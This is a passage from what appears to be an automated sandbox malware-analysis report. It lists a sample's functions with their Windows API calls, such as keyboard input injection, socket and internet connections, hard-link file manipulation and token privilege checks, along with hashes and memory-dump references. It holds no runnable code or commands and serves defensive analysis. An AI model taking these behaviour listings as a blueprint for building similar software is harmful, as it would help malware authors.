                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$__itow
                            • String ID:
                            • API String ID: 3379773720-0
                            • Opcode ID: f6a04c4e0e2c372a5c9dce31c7d3d89f69dcf483999bd3a52b2811eff73441be
                            • Instruction ID: b3b0c12bb978f83b18c45fd2fe1c06624e277e81d0c9871dfa5089bde917452f
                            • Opcode Fuzzy Hash: f6a04c4e0e2c372a5c9dce31c7d3d89f69dcf483999bd3a52b2811eff73441be
                            • Instruction Fuzzy Hash: B041B270A04209ABDF12EF54D855FEE7BB9EF44760F00006AF905A7291DB74AE84CBA5
                            Function 004369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000002,00000011), ref: 004369D1
                            • WSAGetLastError.WSOCK32(00000000), ref: 004369E1
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00436A45
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436A51
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast$__itow__swprintfsocket
                            • String ID:
                            • API String ID: 2214342067-0
                            • Opcode ID: 98ce98f5e9afa741ddcdac5b46a855bff520e846e17f3f08bf228b72084831aa
                            • Instruction ID: ff1fafa6352083560ed69db4b8cce2dba05a53912b42fb02e3a4a647762bae71
                            • Opcode Fuzzy Hash: 98ce98f5e9afa741ddcdac5b46a855bff520e846e17f3f08bf228b72084831aa
                            • Instruction Fuzzy Hash: 8F419175640200BFEB61BF24CC8AF2A77E4AB49B14F05C42DFA59EF2C2DA749D008795
                            Function 0043641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0044F910), ref: 004364A7
                            • _strlen.LIBCMT ref: 004364D9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID:
                            • API String ID: 4218353326-0
                            • Opcode ID: bf4b0d7b230b8910dfbd5917c35a856e21899e5c7785904d2b39f7c880b2da1e
                            • Instruction ID: 924471e4fca5d22720fd8791eaf602285cb7eeea7d77e4071bf5027eb6caa6c0
                            • Opcode Fuzzy Hash: bf4b0d7b230b8910dfbd5917c35a856e21899e5c7785904d2b39f7c880b2da1e
                            • Instruction Fuzzy Hash: 7041E631600105BFCB15EBA9EC85FAEB7A9AF08314F11816AF916DB292DB34ED44CB54
                            Function 0042B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042B89E
                            • GetLastError.KERNEL32(?,00000000), ref: 0042B8C4
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042B8E9
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042B915
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: d200b41689b5985516dd780d9b507117c90ae97e2ef79b9051423294f908559e
                            • Instruction ID: 0e30d34884d1c62a86b523e000327854b9867681ed89297fa2b5324ad557e8d6
                            • Opcode Fuzzy Hash: d200b41689b5985516dd780d9b507117c90ae97e2ef79b9051423294f908559e
                            • Instruction Fuzzy Hash: C141F439A00610DFCB11EF15C589B5ABBE1FF4A710B09809AEC4A9F362CB34ED41CB95
                            Function 00420AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420B27
                            • SetKeyboardState.USER32(00000080), ref: 00420B43
                            • PostMessageW.USER32 ref: 00420BA9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00420BFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: cf43f8c4051b38e823bb69731efac8cafb2b5fd0fc32378f6bd0f991a3a2f23a
                            • Instruction ID: 704d345452b2f5a5a6307bb57fc26b31a9df6399197a4a61c48b164f893ed60b
                            • Opcode Fuzzy Hash: cf43f8c4051b38e823bb69731efac8cafb2b5fd0fc32378f6bd0f991a3a2f23a
                            • Instruction Fuzzy Hash: 5F313B70F402286EFB308BA5AC05BFBBFE5AB45318F84425BE490512D3C37C6945975D
                            Function 00420C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420C66
                            • SetKeyboardState.USER32(00000080), ref: 00420C82
                            • PostMessageW.USER32 ref: 00420CE1
                            • SendInput.USER32(00000001,?,0000001C), ref: 00420D33
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 9b7ae2720dfb9f7f12b60808ac66f39b94fbf4692d2f5c4343f364b6d1c3a750
                            • Instruction ID: 484b98577baa5b4c871c3e10f951de0ea0f5a7378a9bc05f75d1a7855e832d95
                            • Opcode Fuzzy Hash: 9b7ae2720dfb9f7f12b60808ac66f39b94fbf4692d2f5c4343f364b6d1c3a750
                            • Instruction Fuzzy Hash: C6312B70B402286EFF388B66A8047FFBBE6AB45310F84432FE485512D2C37D5946D769
                            Function 003F61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F61FB
                            • __isleadbyte_l.LIBCMT ref: 003F6229
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003F6257
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003F628D
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 6d8ed7d8ec55ac1ea43be050658c7fbb821317bc846e21bc6d3111367c1824fd
                            • Instruction ID: 2298a75f216d5e9f3db84047285ae4909665456a93b782ef40e93564a960c0da
                            • Opcode Fuzzy Hash: 6d8ed7d8ec55ac1ea43be050658c7fbb821317bc846e21bc6d3111367c1824fd
                            • Instruction Fuzzy Hash: 7831D03060025ABFDF228F65CC46BBB7BB9FF42310F164928E9249B1A1D731E950DB90
                            Function 00444EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00444F02
                              • Part of subcall function 00423641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042365B
                              • Part of subcall function 00423641: GetCurrentThreadId.KERNEL32(00000000,?,00425005), ref: 00423662
                              • Part of subcall function 00423641: AttachThreadInput.USER32(00000000,?,00425005), ref: 00423669
                            • GetCaretPos.USER32(?), ref: 00444F13
                            • ClientToScreen.USER32(00000000,?), ref: 00444F4E
                            • GetForegroundWindow.USER32 ref: 00444F54
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: 64d5b414862a2f8559646c60cdfcbb1ab33f3d5649f84cef890eb262c4e80665
                            • Instruction ID: 00b921855fe369148d516462435a16f11f4955db1eb00f0d1d5e61ab68c86ac6
                            • Opcode Fuzzy Hash: 64d5b414862a2f8559646c60cdfcbb1ab33f3d5649f84cef890eb262c4e80665
                            • Instruction Fuzzy Hash: 8E312C71E00208AFDB10EFA5C885EEFB7F9EF99304F11406AE415E7201DA759E058BA4
                            Function 00418656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00418121
                              • Part of subcall function 0041810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0041812B
                              • Part of subcall function 0041810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041813A
                              • Part of subcall function 0041810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00418141
                              • Part of subcall function 0041810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00418157
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004186A3
                            • _memcmp.LIBCMT ref: 004186C6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004186FC
                            • HeapFree.KERNEL32(00000000), ref: 00418703
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                            • String ID:
                            • API String ID: 1592001646-0
                            • Opcode ID: bac2a72a6d24c764b721d69a9758081bf6cac06a59602b4761ec1d1feeb5411b
                            • Instruction ID: c0c1d400b6c5f831114249890b9081799efc9ea5bf1690e1ad6538203dc47a2c
                            • Opcode Fuzzy Hash: bac2a72a6d24c764b721d69a9758081bf6cac06a59602b4761ec1d1feeb5411b
                            • Instruction Fuzzy Hash: F1219D72E00108EFDB10DFA4CA59BEEB7B8EF45304F15406EE444AB241DB35AE45CB98
                            Function 003E098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                            • __setmode.LIBCMT ref: 003E09AE
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            • _fprintf.LIBCMT ref: 003E09E5
                            • OutputDebugStringW.KERNEL32(?), ref: 00415DBB
                              • Part of subcall function 003E4AAA: _flsall.LIBCMT ref: 003E4AC3
                            • __setmode.LIBCMT ref: 003E0A1A
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                            • String ID:
                            • API String ID: 521402451-0
                            • Opcode ID: 740007fccd9b96d70999b4d63deeb2acd0f8a17ddeb50ebdbf4ffd992c5fc07a
                            • Instruction ID: 5d28d3b223d1dd4142773c5b1d90af1f1e801b967d257f14419131ff9702d1d3
                            • Opcode Fuzzy Hash: 740007fccd9b96d70999b4d63deeb2acd0f8a17ddeb50ebdbf4ffd992c5fc07a
                            • Instruction Fuzzy Hash: F4115B315042986FDB06B7B6AC46EFE77689F89320F10026AF1049B1C2EE755C855794
                            Function 00431767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004317A3
                              • Part of subcall function 0043182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043184C
                              • Part of subcall function 0043182D: InternetCloseHandle.WININET(00000000), ref: 004318E9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 7001d90536ded593487d329396a2659d10495e56e2b72e634debeb2b3d687e84
                            • Instruction ID: fe02cc8acf00a6aaa2b89c3e1d40dff98add3e1c5fe7852722f2a746a79828c1
                            • Opcode Fuzzy Hash: 7001d90536ded593487d329396a2659d10495e56e2b72e634debeb2b3d687e84
                            • Instruction Fuzzy Hash: 6B21CF35200601BFEB16AF60CC01FBBBBA9FF4D710F14502FFA1596660DB79981297A8
                            Function 00423A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNEL32(?,0044FAC0), ref: 00423A64
                            • GetLastError.KERNEL32 ref: 00423A73
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00423A82
                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0044FAC0), ref: 00423ADF
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast
                            • String ID:
                            • API String ID: 2267087916-0
                            • Opcode ID: 5696a59bc705fe011937eaf8a2f4514dd549bd50c193c0e676fa68cc68b9868c
                            • Instruction ID: fccd9458c3b41a07663cdca6db255db79591e99780e61e2fa3012e81b2b802b1
                            • Opcode Fuzzy Hash: 5696a59bc705fe011937eaf8a2f4514dd549bd50c193c0e676fa68cc68b9868c
                            • Instruction Fuzzy Hash: 2D21D6342082118F8300DF24D88196BB7F4BE55365F504A3EF499C72A2D779DE4ACB46
                            Function 003F50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 003F5101
                              • Part of subcall function 003E571C: __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003E571C: __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003E571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 36c1936f58b8fa8c38d6a50b3d968315ecc8bf6964eecf582b0f9a7d92657249
                            • Instruction ID: c748dfcce6d726df9f6ec06b3fbe72b49eae749a24ee1f32f366ec58f50034d8
                            • Opcode Fuzzy Hash: 36c1936f58b8fa8c38d6a50b3d968315ecc8bf6964eecf582b0f9a7d92657249
                            • Instruction Fuzzy Hash: AD11CA72900A2AAECF332FB5AC4577E379C9F05361F110A39FB099E291DF7099408794
                            Function 003C44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 003C44CF
                              • Part of subcall function 003C407C: _memset.LIBCMT ref: 003C40FC
                              • Part of subcall function 003C407C: _wcscpy.LIBCMT ref: 003C4150
                              • Part of subcall function 003C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C4160
                            • KillTimer.USER32 ref: 003C4524
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C4533
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003FD4B9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                            • String ID:
                            • API String ID: 1378193009-0
                            • Opcode ID: b3a778300e13d2f788df686a26b3b2ab03872854016be26ed1cc46dc580e1a24
                            • Instruction ID: 2bebaa7334f5f61e40ce3af77bbc9dd4be98bbda6e7c51279311dff3bc5f4c6d
                            • Opcode Fuzzy Hash: b3a778300e13d2f788df686a26b3b2ab03872854016be26ed1cc46dc580e1a24
                            • Instruction Fuzzy Hash: A621F5749047989FE7338B259859FF7BBEC9B02304F04009DE79A96181C7746D88CB51
                            Function 00436369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            • gethostbyname.WSOCK32(?,?,?), ref: 00436399
                            • WSAGetLastError.WSOCK32(00000000), ref: 004363A4
                            • _memmove.LIBCMT ref: 004363D1
                            • inet_ntoa.WSOCK32(?), ref: 004363DC
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: 927d260dcbb93ef2deb6a09846b14955e3c090955ba2e3097cfdeee132fe75e2
                            • Instruction ID: 46cdd8eb3d2d3eca30c045c878d5c244cd2b32419066089a6588fbe0967473ec
                            • Opcode Fuzzy Hash: 927d260dcbb93ef2deb6a09846b14955e3c090955ba2e3097cfdeee132fe75e2
                            • Instruction Fuzzy Hash: 85118E76500109AFCB05FBA4DD46EEEB7B8AF09310B10406AF505EB262DB30AE14CB65
                            Function 00418B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00418B61
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418B73
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418B89
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418BA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: e3275fa4bc764a03989e87da6b38ce184fbaf900c7d036500786312e8e444e8d
                            • Instruction ID: 825282c6683e9ee9b61c42acf7ead0254bbf4ed3a8476851f6e125dd6e171f59
                            • Opcode Fuzzy Hash: e3275fa4bc764a03989e87da6b38ce184fbaf900c7d036500786312e8e444e8d
                            • Instruction Fuzzy Hash: C5110A79901218BFDB11DB95C885F9EBB74EB48710F2040A6E904B7250DA716E51DB94
                            Function 003C1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                            • GetClientRect.USER32(?,?,?,?,?), ref: 003FB5FB
